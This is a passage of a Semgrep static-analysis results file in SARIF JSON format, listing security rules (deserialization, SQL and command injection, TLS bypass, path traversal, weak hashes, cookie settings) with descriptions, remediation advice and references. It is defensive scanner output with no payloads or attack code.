`Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.insecure-object-assign.insecure-object-assign","id":"javascript.lang.security.insecure-object-assign.insecure-object-assign","name":"javascript.lang.security.insecure-object-assign.insecure-object-assign","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.insecure-object-assign.insecure-object-assign"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/json.html](https://docs.python.org/3/library/json.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","id":"python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","name":"python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A specially crafted calldata may be used to impersonate other accounts"},"help":{"markdown":"A specially crafted calldata may be used to impersonate other accounts\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.superfluid-ctx-injection.superfluid-ctx-injection)\n - [https://rekt.news/superfluid-rekt/](https://rekt.news/superfluid-rekt/)\n - [https://medium.com/superfluid-blog/08-02-22-exploit-post-mortem-15ff9c97cdd](https://medium.com/superfluid-blog/08-02-22-exploit-post-mortem-15ff9c97cdd)\n - [https://polygonscan.com/address/0x07711bb6dfbc99a1df1f2d7f57545a67519941e7](https://polygonscan.com/address/0x07711bb6dfbc99a1df1f2d7f57545a67519941e7)\n","text":"A specially crafted calldata may be used to impersonate other accounts"},"helpUri":"https://semgrep.dev/r/solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","id":"solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","name":"solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.superfluid-ctx-injection.superfluid-ctx-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used."},"help":{"markdown":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification)\n - [https://nodejs.org/api/https.html#https_https_request_options_callback](https://nodejs.org/api/https.html#https_https_request_options_callback)\n - [https://stackoverflow.com/questions/20433287/node-js-request-cert-has-expired#answer-29397100](https://stackoverflow.com/questions/20433287/node-js-request-cert-has-expired#answer-29397100)\n","text":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","id":"problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","name":"problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","id":"java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","name":"java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block."},"help":{"markdown":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account_network_rules#default_action](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account_network_rules#default_action)\n - [https://docs.microsoft.com/en-us/azure/firewall/rule-processing](https://docs.microsoft.com/en-us/azure/firewall/rule-processing)\n","text":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","id":"terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","name":"terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"help":{"markdown":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","id":"terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","name":"terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","id":"javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","name":"javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","id":"python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","name":"python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature."},"help":{"markdown":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none)\n - [https://flask-login.readthedocs.io/en/latest/#session-protection](https://flask-login.readthedocs.io/en/latest/#session-protection)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","id":"python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","name":"python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","properties":{"precision":"very-high","tags":["CWE-613: Insufficient Session Expiration","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead."},"help":{"markdown":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1)\n - [https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html](https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html)\n - [https://shattered.io/](https://shattered.io/)\n","text":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","id":"ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","name":"ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","id":"python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","name":"python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands."},"help":{"markdown":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.subprocess-injection.subprocess-injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.subprocess-injection.subprocess-injection","id":"python.flask.security.injection.subprocess-injection.subprocess-injection","name":"python.flask.security.injection.subprocess-injection.subprocess-injection","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.subprocess-injection.subprocess-injection"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","id":"python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","name":"python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary."},"help":{"markdown":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.cryptography-dsa.cryptography-dsa)\n - [https://cryptography.io/en/latest/hazmat/primitives/asymmetric/dsa/](https://cryptography.io/en/latest/hazmat/primitives/asymmetric/dsa/)\n - [https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n - [https://words.filippo.io/dispatches/dsa/](https://words.filippo.io/dispatches/dsa/)\n","text":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary."},"helpUri":"https://semgrep.dev/r/python.cryptography.cryptography-dsa.cryptography-dsa","id":"python.cryptography.cryptography-dsa.cryptography-dsa","name":"python.cryptography.cryptography-dsa.cryptography-dsa","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.cryptography-dsa.cryptography-dsa"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.system-command.command-injection-path.command-injection-path)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.system-command.command-injection-path.command-injection-path","id":"cpp.lang.security.system-command.command-injection-path.command-injection-path","name":"cpp.lang.security.system-command.command-injection-path.command-injection-path","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.system-command.command-injection-path.command-injection-path"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use 